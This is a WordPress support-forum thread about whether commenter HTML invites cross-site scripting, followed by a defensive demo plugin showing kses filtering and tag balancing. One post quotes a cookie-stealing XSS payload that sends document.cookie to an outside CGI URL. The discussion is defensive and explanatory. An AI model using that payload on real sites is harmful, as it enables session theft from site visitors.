• Resolved deko

    (@deko)


    How risky is it to allow a commenter to use HTML tags in his comments?

    For example, what if the commenter tries something like this:

    <script>
    malicious code here
    </script>

    Does anyone know of a plug-in that addresses this?

Viewing 10 replies - 1 through 10 (of 10 total)
  • Out of curiosity, what happened when you tried that? What was your test?

    Thread Starter deko

    (@deko)

    <script>
    var url = 'http://www.mysite.com/send_me_passwords.cgi';
    url = url + '?cookie=' + escape(document.cookie)
    document.write('<script src="'+url+'">');
    </script>

    from: http://iamcal.com/publish/articles/php/processing_html/

    I think it would be best to disallow all markup in comments to avoid any risk.

    This plugin:

    http://www.chweng.idv.tw/blog/wordpress/comment-without-tags/

    Is supposed to:

    “Strip all HTML tags in comments to prevent malicious or malformed tags from destroying your pages”

    I have not tested it. I downloaded it and it’s only one script that appears to reference a non-existent function.

    What we need is built-in comment scrubbing.

    Thread Starter deko

    (@deko)

    This looks promising:

    http://pear.php.net/package/HTML_Safe

    But the first line of the script is this:

    // requires HTMLSax3 package
    require_once 'XML/HTMLSax3.php';

    Does anyone know how to verify if my host’s server has the HTMLSax3 package installed?

    Can this be verified using phpinfo.php?

    Thread Starter deko

    (@deko)

    This is a better site to download HTML_Safe:

    http://pixel-apes.com/safehtml

    I’ve tested and verified that a bug exists in 2.0.2, namely, that an unclosed markup tag, submitted in a comment, will affect the appearance of text outside of that comment, thus altering the display of your blog.

    But the more important question remains:

    Are WP blogs at risk of cross-site scripting (XSS) when users submit malicious code in the Comments form?

    I was pretty sure WP >did< some level of scrubbing. What have you tried that’s worked?

    Thread Starter deko

    (@deko)

    I don’t know enough about XSS to test for a vulnerability, but I’m going to use HTML_Safe anyway, if only to squash the ‘unclosed tag in comments’ bug.

    I looked for codex documentation explaining why WP blogs are safe from XSS and other malicious code submitted in comments. I found this:

    unfiltered_html

    Allows – if enabled – the user to post HTML markup or even Javascript code in posts, pages or comments.

    Note: Enabling this option for non-privileged users may result in their posting malicious code to your blog.

    http://codex.wordpress.org/Roles_and_Capabilities#Editor

    I don’t know if unfiltered_html is disabled by default, but unless there’s some documentation assuring us that we’re safe, it’s best to assume we’re not.

    Definitely definitely safe. The unfiltered_html cap is only given to admins and certainly not to anonymous users or even registered ones.

    This is something that has been safe in the WP core for literally years.

    unfiltered_html is granted initially only to users having the Administrator or Editor roles. Casual users visiting your site will have their comments stripped of tags that are not allowed, including script tags.

    When you are logged in as a user with the unfiltered_html capability, you are allowed to post script into comments. This is why you would be able to do this on your own blog.

    IIRC, kses is used to prevent unwanted markup from users without this capability.

    WP uses kses to filter comments. Users that have the unfiltered_html capability (Editors and Administrators) are not filtered. They are considered trusted.

    Thread Starter deko

    (@deko)

    I did some testing with the kses file, and yes, it appears that unfiltered_html is allowed only for Admins and Editors.

    I commented the <em> tag (from @allowedtags) and then tried marking up a comment with it to see if it had any effect – it didn’t, unless I was logged in as Admin (indicating that html was filtered by kses otherwise).

    So kses is protecting us.

    kses doesn’t catch unclosed tags in comments, but this is not a security problem.
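
The two things discussed in this thread, the kses allowlist pass that untrusted commenters get and the separate tag-balancing problem, can be made visible with a small plugin. The code below is an added example, not from this thread and not WordPress core; it assumes WordPress is loaded (drop it in as a plugin, or run it with WP-CLI’s `wp eval-file`). The function names `demo_filter_comment` and `demo_balance_comment` and the sample comments are this example’s own; `wp_kses()`, the `$allowedtags` global, `current_user_can()` and `force_balance_tags()` are core functions.

```php
<?php
/*
Plugin Name: Comment filtering demo (constructed example, not WordPress core)
*/

// Assumes WordPress is loaded: run as a plugin, or with WP-CLI:
//   wp eval-file comment-filter-demo.php
// demo_* functions are this example's own; the APIs they call are core.

/**
 * Filter a comment body the way core's kses pass treats an untrusted
 * commenter: everything outside the comment allowlist is stripped.
 * Core wires this up itself (kses_init_filters() hooks wp_filter_kses onto
 * 'pre_comment_content'); this function only makes that step visible.
 */
function demo_filter_comment( $comment ) {
    global $allowedtags; // core's comment allowlist: a, em, strong, blockquote, code, ...

    // Users holding unfiltered_html (Administrators, and in this thread's era
    // Editors) are trusted: core does not strip their markup.
    if ( current_user_can( 'unfiltered_html' ) ) {
        return $comment;
    }

    // wp_kses() removes tags not in the allowlist, attributes not allowed on
    // an allowed tag, and disallowed URL schemes (javascript: and the like).
    // It keeps the plain text that sat between the removed tags.
    return wp_kses( $comment, $allowedtags );
}

/**
 * The display problem is separate from XSS: kses does not balance tags,
 * so an unclosed <em> leaks into the rest of the page. force_balance_tags()
 * closes it.
 */
function demo_balance_comment( $comment ) {
    return force_balance_tags( $comment );
}

// Constructed sample comments (not real submissions).
$samples = array(
    '<script>test()</script>Nice post!',          // script tag: not in the allowlist
    '<em onmouseover="test()">emphasis</em>',      // allowed tag, disallowed attribute
    '<a href="javascript:test()">link</a>',        // allowed tag, disallowed URL scheme
    '<em>unclosed emphasis',                       // the display bug from the thread
);

foreach ( $samples as $sample ) {
    $filtered = demo_filter_comment( $sample );
    printf( "in:  %s\nout: %s\n\n", $sample, demo_balance_comment( $filtered ) );
}
```

Run while not logged in (or under WP-CLI, where there is no current user) and the first sample comes out as the bare text `test()Nice post!`: the tags are gone, the harmless text between them stays. The `onmouseover` attribute and the `javascript:` scheme are removed from the second and third samples because `$allowedtags` permits no attributes on `em` and kses checks URL protocols on `href`. The last sample shows the point made above: `wp_kses()` leaves `<em>unclosed emphasis` as it is, and only `force_balance_tags()` appends the missing `</em>`. Log in as an Administrator and rerun it to see the trusted path, where nothing is stripped.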

  • The topic ‘How to make comments safe?’ is closed to new replies.